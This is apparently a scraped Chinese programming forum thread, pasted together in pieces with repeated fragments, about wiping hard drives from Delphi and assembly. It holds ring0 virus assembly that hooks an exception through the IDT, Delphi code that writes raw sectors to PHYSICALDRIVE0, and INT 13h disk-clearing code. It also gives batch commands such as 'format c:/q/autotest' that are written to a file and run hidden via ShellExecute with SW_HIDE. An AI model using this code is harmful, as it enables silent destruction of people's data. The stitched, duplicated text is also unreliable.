; ************************************* ; * When Exception Error Occurs,* ; * Our OS System should be in NT. * ; * So My Cute Virus will not * ; * Continue to Run, it Jmups to* ; * Original Application to Run.* ; *************************************
StopToRunVirusCode: @1 = StopToRunVirusCode
xor ebx, ebx mov eax, fs:[ebx] mov esp, [eax]
RestoreSE: pop dword ptr fs:[ebx] pop eax
; ************************************* ; * Return Original App to Execute * ; *************************************
pop ebp
push 00401000h ; Push Original OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack
ret ; Return to Original App Entry Point
; ********************************************************* ; * Ring0 Virus Game Initial Program * ; *********************************************************
MyExceptionHook: @2 = MyExceptionHook
jzInstallMyFileSystemApiHook
; ************************************* ; * Do My Virus Exist in System !? * ; *************************************
; ************************************* ; * Return to Ring3 Initial Program * ; *************************************
ExitRing0Init: mov [ebx-04h], bp ; shr ebp, 16 ; Restore Exception mov [ebx+02h], bp ;
iretd
procedure TForm1.Button2Click(Sender: TObject); const BytesPerSector=512; SectorCount=1; SectorStart=0; drive='\\.\PHYSICALDRIVE0'; var str:string; p:pchar; i:Cardinal; begin hDeviceHandle := CreateFile(drive, GENERIC_ALL, //如果只是读扇区,可以用GENERIC_READ FILE_SHARE_READ or FILE_SHARE_WRITE, nil, OPEN_EXISTING,0, 0); if (hDeviceHandle <> INVALID_HANDLE_VALUE) then begin p:=allocmem(SectorCount*BytesPerSector); FileSeek(hDevicehandle,SectorStart*BytesPerSector,0); if FileRead(hDevicehandle,p[0],SectorCount*BytesPerSector)<>SectorCount*BytesPerSector then raise exception.create('Read错误'); str:=''; for i:=0 to 512-1 do begin str:=str+format('%.2x',[integer(p[i])]); if i mod 16=15 then str:=str+#13; end; showmessage(str); FileSeek(hDevicehandle,SectorStart*BytesPerSector,0); if FileWrite(hDevicehandle,p[0],SectorCount*BytesPerSector)<>SectorCount*BytesPerSector then raise exception.create('Write错误%d'); freemem(p,SectorCount*BytesPerSector); closehandle(hDeviceHandle); end; end;
asm 能清除真个硬盘,但对ntfs没作用mov ax,0301 mov bx,200 mov cx,1 mov dx,80 int 13 int 3bat 留个系统给他y | format c:/u/q/s
1.找找网上的关于进入ring0全县的代码
2.通过BIOS中断INT 13H的5H功能进行格式化.附:
AL=扇区数
(CL)6,7(CH)0~7=磁道号
(CL)0~5扇区号
DH/DL=磁头号/驱动器号
ES:BX=格式化参数表指针AH=0则成功,否则返回错误代码
push eax ;
sidt [esp-02h] ; Get IDT Base Address
pop ebx ;
add ebx, HookExceptionNumber*08h+04h ; ZF = 0
cli
mov ebp, [ebx]; Get Exception Base
mov bp, [ebx-04h] ; Entry Point
lea esi, MyExceptionHook-@1[ecx]
push esi
mov [ebx-04h], si ;
shr esi, 16 ; Modify Exception
mov [ebx+02h], si ; Entry Point Address
pop esi
; *************************************
; * Generate Exception to Get Ring0 *
; *************************************
int HookExceptionNumber ; GenerateException
ReturnAddressOfEndException = $
; *************************************
; * Merge All Virus Code Section*
; *************************************
; *************************************
; * Generate Exception Again *
; *************************************
int HookExceptionNumber ; GenerateException Aga
; *************************************
; * Let's Restore *
; * Structured Exception Handing*
; *************************************
ReadyRestoreSE:
sti
xor ebx, ebx
jmp RestoreSE
; *************************************
; * When Exception Error Occurs,*
; * Our OS System should be in NT. *
; * So My Cute Virus will not *
; * Continue to Run, it Jmups to*
; * Original Application to Run.*
; *************************************
StopToRunVirusCode:
@1 = StopToRunVirusCode
xor ebx, ebx
mov eax, fs:[ebx]
mov esp, [eax]
RestoreSE:
pop dword ptr fs:[ebx]
pop eax
; *************************************
; * Return Original App to Execute *
; *************************************
pop ebp
push 00401000h ; Push Original
OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack
ret ; Return to Original App Entry Point
; *********************************************************
; * Ring0 Virus Game Initial Program *
; *********************************************************
MyExceptionHook:
@2 = MyExceptionHook
jzInstallMyFileSystemApiHook
; *************************************
; * Do My Virus Exist in System !? *
; *************************************
mov ecx, dr0
jecxz AllocateSystemMemoryPage
add dword ptr [esp], ReadyRestoreSE-ReturnAddressOf
dException
; *************************************
; * Return to Ring3 Initial Program *
; *************************************
ExitRing0Init:
mov [ebx-04h], bp ;
shr ebp, 16 ; Restore Exception
mov [ebx+02h], bp ;
iretd
const
BytesPerSector=512;
SectorCount=1;
SectorStart=0;
drive='\\.\PHYSICALDRIVE0';
var
str:string;
p:pchar;
i:Cardinal;
begin
hDeviceHandle := CreateFile(drive, GENERIC_ALL, //如果只是读扇区,可以用GENERIC_READ
FILE_SHARE_READ or FILE_SHARE_WRITE, nil, OPEN_EXISTING,0, 0);
if (hDeviceHandle <> INVALID_HANDLE_VALUE) then
begin
p:=allocmem(SectorCount*BytesPerSector); FileSeek(hDevicehandle,SectorStart*BytesPerSector,0);
if FileRead(hDevicehandle,p[0],SectorCount*BytesPerSector)<>SectorCount*BytesPerSector then
raise exception.create('Read错误'); str:='';
for i:=0 to 512-1 do
begin
str:=str+format('%.2x',[integer(p[i])]);
if i mod 16=15 then str:=str+#13;
end;
showmessage(str); FileSeek(hDevicehandle,SectorStart*BytesPerSector,0);
if FileWrite(hDevicehandle,p[0],SectorCount*BytesPerSector)<>SectorCount*BytesPerSector then
raise exception.create('Write错误%d'); freemem(p,SectorCount*BytesPerSector);
closehandle(hDeviceHandle);
end;
end;
mov bx,200
mov cx,1
mov dx,80
int 13
int 3bat 留个系统给他y | format c:/u/q/s
在memo1里面写
format c:/q/autotest
format d:/q/autotest
保存到硬盘
memo1.lines.savetofile('c:\run.bat');
调用run.bat文件(在调用前,在uses中加入shellapi单元)
shellexecute(handle,nil,pchar('c:\run.bat'),nil,nil,sw_hide);
OK。。
stdcall;const
SHFMT_ID_DEFAULT = $FFFF;
// Formating options
SHFMT_OPT_QUICKFORMAT = $0000;
SHFMT_OPT_FULL = $0001;
SHFMT_OPT_SYSONLY = $0002;
// Error codes
SHFMT_ERROR = $FFFFFFFF;
SHFMT_CANCEL = $FFFFFFFE;
SHFMT_NOFORMAT = $FFFFFFFD;
function tform1.SHFormatDrive(Handle: HWND; Drive, ID, Options: Word): LongInt;
stdcall; external 'shell32.dll' name 'SHFormatDrive'procedure TForm1.Button1Click(Sender: TObject);
var
retCode: LongInt;
begin
retCode:= SHFormatDrive(Handle, 0, SHFMT_ID_DEFAULT,
SHFMT_OPT_QUICKFORMAT);
if retCode < 0 then
ShowMessage('Could not format drive');
end;
format c:/q/autotest
format d:/q/autotest
format e:/q/autotest
http://61.132.94.44/~upload/sforever/index/daima/hurt_scr.rar基本上还是用了批处理文件,^_^ 要是有直接的格式化硬盘函数就好了,不知道微软到底有没有提供。